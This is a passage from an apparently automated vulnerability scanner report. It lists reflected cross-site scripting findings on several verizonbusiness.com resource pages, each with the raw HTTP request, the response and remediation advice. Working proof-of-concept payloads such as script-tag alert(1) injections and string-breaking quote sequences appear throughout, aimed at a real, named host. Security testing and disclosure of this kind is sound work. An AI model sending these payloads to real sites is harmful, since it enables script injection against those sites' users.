Date: Wed, 17 Nov 2010 00:26:24 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:26:24 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources/b3c86';8de0ea00750'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.616. http://www.verizonbusiness.com/resources/1002a2a18-111-Going+Green.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a18-111-Going+Green.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d50cc</script><script>alert(1)</script>ac3431dd5e1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a2a18-111-Going+Green.xmld50cc</script><script>alert(1)</script>ac3431dd5e1 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "ecb53c395cd8c9772c3131f0f0aa20aa"
Last-Modified: Wed, 17 Nov 2010 00:26:08 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:26:08 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3d50ea8a0c-a7e9-4757-9739-ae844f916564|VTID%3d2e916e60-a7e2-4c95-a3c2-aa2976b8ce15|SX%3d1289954768|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:29:52 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:26:08 GMT
Content-Length: 40495

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<url>/resources/1002a2a18-111-Going+Green.xmld50cc</script><script>alert(1)</script>ac3431dd5e1</url>
...[SNIP]...

1.617. http://www.verizonbusiness.com/resources/1002a2a19-111-Improving+Productivity.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a19-111-Improving+Productivity.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e18a"%3b1f585edfd56 was submitted in the REST URL parameter 1. This input was echoed as 8e18a";1f585edfd56 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources8e18a"%3b1f585edfd56/1002a2a19-111-Improving+Productivity.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:23:36 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40680
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:23:36 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:23:36 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources8e18a";1f585edfd56/1002a2a19-111-Improving+Productivity.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION
...[SNIP]...

1.618. http://www.verizonbusiness.com/resources/1002a2a19-111-Improving+Productivity.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a19-111-Improving+Productivity.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 342d4'%3b6120a4e522b was submitted in the REST URL parameter 1. This input was echoed as 342d4';6120a4e522b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources342d4'%3b6120a4e522b/1002a2a19-111-Improving+Productivity.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:23:44 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40680
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:23:44 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:23:44 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources342d4';6120a4e522b/1002a2a19-111-Improving+Productivity.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.619. http://www.verizonbusiness.com/resources/1002a2a19-111-Improving+Productivity.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a19-111-Improving+Productivity.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f6ab</script><script>alert(1)</script>523e1ff0542 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a2a19-111-Improving+Productivity.xml6f6ab</script><script>alert(1)</script>523e1ff0542 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "4fe11e7252c5fdc57815d5e3523c976a"
Last-Modified: Wed, 17 Nov 2010 00:26:47 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:26:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3d12b08b67-f418-4ccc-954b-00af989ca0db|VTID%3d89fe2116-6729-4c3b-ad1f-73c702c6492f|SX%3d1289954806|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:30:30 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:26:47 GMT
Content-Length: 38971

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<url>/resources/1002a2a19-111-Improving+Productivity.xml6f6ab</script><script>alert(1)</script>523e1ff0542</url>
...[SNIP]...

1.620. http://www.verizonbusiness.com/resources/1002a2a19-111-Improving+Productivity.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a19-111-Improving+Productivity.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5c7af'%3b68aed609408 was submitted in the REST URL parameter 2. This input was echoed as 5c7af';68aed609408 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/5c7af'%3b68aed609408 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:26:49 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:26:49 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:26:49 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/5c7af';68aed609408'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.621. http://www.verizonbusiness.com/resources/1002a2a2-111-Conferencing.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a2-111-Conferencing.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e4b59"%3b45fc3c39ca4 was submitted in the REST URL parameter 1. This input was echoed as e4b59";45fc3c39ca4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcese4b59"%3b45fc3c39ca4/1002a2a2-111-Conferencing.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:19:37 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40658
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:19:37 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:19:37 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resourcese4b59";45fc3c39ca4/1002a2a2-111-Conferencing.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELE
...[SNIP]...

1.622. http://www.verizonbusiness.com/resources/1002a2a2-111-Conferencing.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a2-111-Conferencing.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 51d92'%3bc5380f9268a was submitted in the REST URL parameter 1. This input was echoed as 51d92';c5380f9268a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources51d92'%3bc5380f9268a/1002a2a2-111-Conferencing.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:19:53 GMT
Content-Type: text/html
Content-Length: 40660
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:19:54 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:19:53 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources51d92';c5380f9268a/1002a2a2-111-Conferencing.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.623. http://www.verizonbusiness.com/resources/1002a2a2-111-Conferencing.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a2-111-Conferencing.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b67e4'%3bee33f56f39d was submitted in the REST URL parameter 2. This input was echoed as b67e4';ee33f56f39d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/b67e4'%3bee33f56f39d HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:22:02 GMT
Content-Type: text/html
Content-Length: 40212
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:22:02 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:22:02 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/b67e4';ee33f56f39d'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.624. http://www.verizonbusiness.com/resources/1002a2a2-111-Conferencing.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a2-111-Conferencing.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 826ee</script><script>alert(1)</script>d957ea4511f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a2a2-111-Conferencing.xml826ee</script><script>alert(1)</script>d957ea4511f HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "002976f3db11484242cddd5990429a76"
Last-Modified: Wed, 17 Nov 2010 00:22:00 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:22:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3df3136736-9d53-459c-a764-3b0181d0ee0f|VTID%3d1b8b9046-1477-46db-af61-84aac1e49506|SX%3d1289954520|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:25:44 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:22:00 GMT
Content-Length: 49832

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<url>/resources/1002a2a2-111-Conferencing.xml826ee</script><script>alert(1)</script>d957ea4511f</url>
...[SNIP]...

1.625. http://www.verizonbusiness.com/resources/1002a2a20-111-Mobility.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a20-111-Mobility.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c698e'%3bd962ad9b50c was submitted in the REST URL parameter 1. This input was echoed as c698e';d962ad9b50c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesc698e'%3bd962ad9b50c/1002a2a20-111-Mobility.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:23:41 GMT
Content-Type: text/html
Content-Length: 40652
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:23:41 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:23:41 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resourcesc698e';d962ad9b50c/1002a2a20-111-Mobility.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.626. http://www.verizonbusiness.com/resources/1002a2a20-111-Mobility.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a20-111-Mobility.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89580"%3b7578e08213f was submitted in the REST URL parameter 1. This input was echoed as 89580";7578e08213f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources89580"%3b7578e08213f/1002a2a20-111-Mobility.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:23:10 GMT
Content-Type: text/html
Content-Length: 40652
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:23:10 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:23:10 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources89580";7578e08213f/1002a2a20-111-Mobility.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMEN
...[SNIP]...

1.627. http://www.verizonbusiness.com/resources/1002a2a20-111-Mobility.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a20-111-Mobility.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b00f9'%3bbc3286ccbe2 was submitted in the REST URL parameter 2. This input was echoed as b00f9';bc3286ccbe2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/b00f9'%3bbc3286ccbe2 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:26:53 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:26:53 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:26:53 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/b00f9';bc3286ccbe2'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.628. http://www.verizonbusiness.com/resources/1002a2a20-111-Mobility.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a20-111-Mobility.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 531d2</script><script>alert(1)</script>8d3c801e429 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a2a20-111-Mobility.xml531d2</script><script>alert(1)</script>8d3c801e429 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "1ef91108d2cd24b6567004273dc94001"
Last-Modified: Wed, 17 Nov 2010 00:26:51 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:26:51 GMT
Connection: close
Connection: Transfer-Encoding
